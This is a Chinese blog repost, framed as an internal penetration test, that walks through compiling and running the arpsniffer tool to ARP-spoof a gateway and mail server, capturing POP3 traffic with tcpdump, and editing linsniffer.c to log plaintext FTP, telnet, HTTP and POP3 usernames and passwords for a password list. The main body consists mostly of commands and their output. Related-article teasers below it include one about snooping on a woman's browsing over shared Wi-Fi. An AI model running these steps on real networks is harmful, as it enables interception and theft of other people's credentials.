Linux下嗅探又一实例截取

最新推荐文章于 2022-02-11 17:05:54 发布
最新推荐文章于 2022-02-11 17:05:54 发布
阅读量102 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统 网络 运维
原文链接:https://yq.aliyun.com/articles/439942
本文详细介绍如何在SecureCRT环境下安装必要的库文件并编译ArpSniffer程序,通过实例展示了如何利用ArpSniffer捕获网络数据包,进而获取明文用户名和密码的过程。

在SecureCRT下利用rz命令上传我们用到的arpsniffer.c,然后编译:

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

报错,可能是没装libnet的缘故,看说明Make: first you must install "pcap" and "libnet" 确定arpsniffer.c需要先装pcap和 libnet。

[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz 
[root@bbs111 root]# cd libpcap-0.8.1
[root@bbs111 libpcap-0.8.1]# ./configure 
[root@bbs111 libpcap-0.8.1]# make
[root@bbs111 libpcap-0.8.1]# make install

准备工作已经ok。下面重新编译arpsniffer.c

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

这次没报错,编译成功。

[root@bbs111 root]# ./arpsniffer 
====================================
============Arp Sniffer=============
==========Write by Paris-Ye=========
===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
===For example:
        ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)

[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
110
110
Get network cards mac address:
M-> 00:0e:a6:a5:80:4f
W-> 00:0f:e2:23:05:d0
S-> 00:d0:b7:88:07:59

Now Start... .. .

在另一个登录里面用tcpdump监听下:

[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11

发现有数据,把监听的数据存在文件里面:

[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。果然发现明文用户名和密码。

下面我们就可以用linsniffer监听我们想要的用户名和密码了。
先修改linsniffer.c:根据自己的需求监听相应的应用密码。我的如下:

   if(ntohs(tcp->dest)==21)  p=1; /* ftp */
   if(ntohs(tcp->dest)==22)  p=1; /* ssh for comparison added for example only comment out if desired*/
   if(ntohs(tcp->dest)==23)  p=1; /* telnet */
   if(ntohs(tcp->dest)==80) p=1;  /* http */
   if(ntohs(tcp->dest)==110) p=1; /* pop3 */
   if(ntohs(tcp->dest)==513) p=1; /* rlogin */
   if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c 
In file included from /usr/include/linux/tcp.h:21,
                 from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

不用管警告,直接运行编译后的linsniffer即可。

[root@bbs111 root]# ./linsniffer

用户名和密码都自动存到了tcp.log下。如图8:
 

经过测试后,我们把某人的用户名和密码发给某人,相信他再不会想当然的说sniffer不可能了。下面我们利用我们嗅探到的密码做个密码表,进行新一轮进一步的内网渗透测试。相信在我们根据渗透测试结果,进行相关安全技术改造和安全管理规范制度改造后,我们的网络的安全性会大大提升。


本篇文章来源于 Vitter's Blog 原文链接:http://blog.vfocus.net/archives/000500.html

















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/402963,如需转载请自行联系原作者

国家信息安全水平考试NISP级官方视频知识点整理
rhxznp的博客
08-03 1万+
文章目录)信息安全概述(了解即可,考察较少)1.1 信息与信息安全1.1.1信息1.1.2 信息技术1.1.3 信息安全1.1.4 信息系统安全1.2 信息安全威胁1.3 信息安全发展阶段与形式1.4 信息安全保障1.4.1 信息安全保障含义1.4.2 信息安全保障模型1.5 信息系统安全保障1.5.1 信息系统1.5.2 信息安全保障的含义二)信息安全基础技术(重点)2.1 密码学![在这里插入图片描述](https://img-blog.csdnimg.cn/cc933e404bb34c549e0aa
kali linux之窥看女神上网隐私(ettercap+wireshark+zenmap +dsniff)
热门推荐
b305723的专栏
07-20 1万+
作者:小波 http://www.cnblogs.com/xiaobo-Linux/ 无聊就玩了玩,不要干些坏事哟~~网上也有些文章关于kali linux的,就实战了番。kali是用的debian 。 前提你与女神处于同wifi下。 找到女神的ip地址,这个点她手机里面的wlan就可以看到。那么也可以用ip scanner扫描出来。 ip scanner k...
linux嗅探工具tcpdump的使用
疯狂的鼠标
09-29 1729
tcpdump-转储网络上的数据流tcpdump[-adeflnNOpqStvx][-ccount][-Ffile][-iinterface][-rfile][-ssnaplen][-Ttype][-wfile][expression]描述(DESCRIPTION)Tcpdump打印出在某个网络界面上,匹配布尔表达式expression的报头.对于SunOS的nit或bpf界面:要运行tcpdum
linux 下c实现简单的网络嗅探
02-14
简单的网络嗅探
python实现windows和linux上的包嗅探
complay_ly的博客
09-23 1164
python实现windows和linux上的包嗅探 源于《python黑帽子 黑客与渗透测试编程之道》第三章:windows和linux上的包嗅探 import socket import os # 监听的网卡 ps: windows下用0.0.0.0会报错 host = "192.168.0.117" # Windows和Linux的区别是Windows允许我们嗅探所有协议的所有数据包(I...
linux嗅探工具
martin2350的专栏
09-28 2753
Dsniff是个著名的网络嗅探工具包。其开发者Dug Song早在1999年12月,以密歇根大学CITI研究室(Center for Information Technology Integration)的研究成果为基础,开发了这个后来具有很大影响力的网络安全工具包。Dug S
系统监控与日志分析:Kali Linux高级工具应用
Kali Linux是信息安全专业人士广泛使用的Linux发行版,它预装了大量的渗透测试工具。本章将探讨Kali Linux的基础知识,并介绍系统监控的重要性以及些基本的监控工具和方法。 ## Kali Linux的定位 作为渗透测试和...
Linux网络诊断工具高级应用:从ping到tcpdump的全方位解读
![Linux网络诊断工具高级应用:从ping到tcpdump的全方位解读](https://img-blog.csdnimg.cn/20200322123728608.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text...Linux环境为我们提供了强
移动设备安全测试新方案:Kali Linux工具箱揭秘
![移动设备安全测试新方案:Kali Linux工具箱揭秘]...在这样的背景下,理解移动设备安全的概念、威胁和防御措施变得至关重要。 ## 1
TCP_IP协议与Linux网络通信
TCP/IP协议是网络通信协议,是互联网的基础协议之。它是由两个协议组成的,即传输控制协议(TCP)和Internet协议(IP)。TCP负责数据的可靠传输和流量控制,而IP则负责数据的分组传输和路由选择。 TCP/IP协议...
005.TCP--拼接TCP头部IP头部,实现TCP三次握手的第步(Linux,原始套接字)
maimang1001的专栏
02-11 664
005.TCP--拼接TCP头部IP头部,实现TCP三次握手的第步(Linux,原始套接字) - ruo_yu - 博客园.目的:自己拼接IP头,TCP头,计算效验和,将生成的报文用原始套接字发送出去。若使用tcpdump能监听有对方服务器的包回应,则证明TCP报文是正确的!二.数据结构:TCP首部结构图:structhttps://www.cnblogs.com/ruo-yu/p/4982969.html .目的 自己拼接IP头,TCP头,计算效验和,将生成的报文用原始套接字发送出去。 若使用
linux如何ARP嗅探 Linux嗅探工具Dsniff安装记录
weixin_33908217的博客
09-20 837
  先来下载依赖包 和些必须要用到的工具 我这里用的是 dsniff-2.3 的版本 wget http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz wget http://www.8090sec.com/uploads/soft/dsniff-2.3.tar.gz 备用下载 、安装gcc # yum -y ins...
安全运维之:Linux后门入侵检测工具的使用
靠谱运维
09-25 6478
、rootkit简介 rootkit是Linux平台下最常见的种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对系统的危害很大,它通过套工具来建立后门和隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root权限登录到系统。 rootkit主要有两
struct--tcphdr
LBY8203XJ的专栏
11-21 714
sk_buff->tcphdr /usr/src/linux-2.6.19/include/linux/tcp.h struct tcphdr {     __be16 source;     __be16 dest;     __be32 seq;     __be32 ack_seq; #if defined(__LITTLE_ENDIAN_BITFIELD)
NMAP网络扫描和嗅探工具包
学习........
10-23 1302
Linux,FreeBSD,UNIX,Windows下的网络扫描和嗅探工 具包,其基本功能有三个,是探测组主机是否在线;其次是扫描 主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。Nmap可用于扫描仅有两个节点的LAN,直至500个节点以上的网络。Nmap 还允许用户定制扫描技巧。通常,个简单的使用ICMP协议的ping操 作可以满足般需求;也可以深入探测UDP或者TCP
Ettercap-交换环境下的嗅探器使用方法
lanndmentt的专栏
11-14 1150
:安装    你可以在网上很多地方下载到它的最新版本,比如http://ettercap.sourceforge.net 下载完后,先解压缩: 文件: ettercap-0.6.9.tar.gz 大小: 665KB 下载: 下载[root@CIEL root]#tar zxpvf ettercap-0.6.tar.gz [root@CIEL
linux 实现嗅探工具dsniff
weixin_34240520的博客
11-27 828
dsniff是家集工具为网络审计和渗透测试dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf,webspy被动监测网络的数据(密码、电子邮件、文件等)。arpspoof,dnsspoof,macof方便截取网络流量通常不能攻击者(e。g,由于第2层交换)。sshmitm和webmitm实现主动的猴子在中间攻击重定向...
Linux下snort嗅探器源码获取指南
标题“snort嗅探器源码”直接指向了个开源网络安全工具——Snort。Snort是种轻量级的网络入侵检测系统(IDS),它能够实时监测网络流量,分析数据包,检测针对系统的攻击行为以及安全策略的违背。Snort广泛应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值